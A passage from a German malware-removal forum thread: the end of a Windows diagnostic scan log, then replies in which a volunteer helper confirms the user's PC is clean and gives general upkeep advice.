2009-02-27 10:20 - 2009-02-27 10:20 - 00036864 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Utility\3.0.3009.0__4df5dcab8860d239\Framework.Utility.dll
2008-07-30 05:01 - 2003-06-07 06:30 - 00057344 _____ () C:\Program Files\Launch Manager\PowerUtl.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-717213786-2690546565-922636609-500 - Administrator - Disabled)
finja (S-1-5-21-717213786-2690546565-922636609-1000 - Administrator - Enabled) => C:\Users\finja
Gast (S-1-5-21-717213786-2690546565-922636609-501 - Limited - Disabled)
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (12/06/2014 08:57:13 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (12/06/2014 05:42:55 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
System errors:
=============
Microsoft Office Sessions:
=========================
CodeIntegrity Errors:
===================================
Date: 2014-12-06 22:37:19.011
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 22:37:18.465
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 22:37:17.950
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 22:37:17.358
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 22:34:46.464
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 22:34:45.879
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 22:34:45.344
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 22:34:44.654
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 20:57:24.971
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2014-12-06 19:24:00.228
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
==================== Memory info ===========================
Processor: Pentium(R) Dual-Core CPU T4200 @ 2.00GHz
Percentage of memory in use: 42%
Total physical RAM: 3001.08 MB
Available physical RAM: 1720.41 MB
Total Pagefile: 6232.44 MB
Available Pagefile: 4905.39 MB
Total Virtual: 2047.88 MB
Available Virtual: 1916.8 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:288.08 GB) (Free:233.98 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 93D3AC9B)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=288.1 GB) - (Type=07 NTFS)
==================== End Of Log ============================
|
|
06.12.2014, 22:41
| #8 |
| | Trojan.FakeMS.ED in dll-Datei Wie läuft das System?
__________________ Proud member of Unite |
|
06.12.2014, 22:45
| #9 |
| | Trojan.FakeMS.ED in dll-Datei Ich kann es ja leider nicht mit nem Zustand vergleichen, als der Rechner noch nicht infiziert war. Aber vom momentanen Gefühl her läuft er definitiv stabil und auch wesentlich schneller...ich würde es als Normalgeschwindigkeit für die Specs und das OS des Rechners einschätzen. Sieht also ganz gut aus denke ich, oder? |
|
06.12.2014, 22:48
| #10 |
| | Trojan.FakeMS.ED in dll-Datei Hallo, nach meiner Erkenntnis, ist Dein PC soweit sauber.  Die Reihenfolge ist hier entscheidend.
Falls Du mir Feedback geben willst, kannst Du es hier gerne tun: Lob, Kritik und Wünsche - Trojaner-Board Ich kann garnicht zu oft erwähnen, wie wichtig es ist, dass dein System Up to Date ist.
Sicheres Browsen
Performance Bereinige regelmäßig deine Temp Files. Ich empfehle hierzu TFC Halte dich fern von jedlichen Registry Cleanern. Diese Schaden deinem System mehr als sie helfen. Hier ein paar ( englishe ) Links Miekemoes Blogspot ( MVP ) Bill Castner ( MVP ) Don'ts
Hinweis: Bitte gib mir eine kurze Rückmeldung wenn alles erledigt ist und keine Fragen mehr vorhanden sind, so das ich diesen Thread aus meinen Abos löschen kann.
__________________ Proud member of Unite |
|
06.12.2014, 22:59
| #11 |
| | Trojan.FakeMS.ED in dll-Datei So, dann möchte ich mich herzlich für die überaus kompetente Hilfe bedanken! Das System ist wieder sauber  Ich werde die Ratschläge mal an meinen Kollegen weitergeben, um uns allen zukünftigen Ärger zu ersparen. In diesem Sinne, gute Nacht |
|
06.12.2014, 23:05
| #12 |
| | Trojan.FakeMS.ED in dll-Datei Kein Problem. 
__________________ Proud member of Unite |
|
| Themen zu Trojan.FakeMS.ED in dll-Datei |
| adware, askbar, browser, computer, cpu, excel, failed, flash player, funktioniert nicht mehr, google, helper, home, launch, mozilla, outbound, popup, port, programm, refresh, registry, rundll, security, software, svchost.exe, symantec, system, trojaner, updates, usb, windows |
Linear-Darstellung
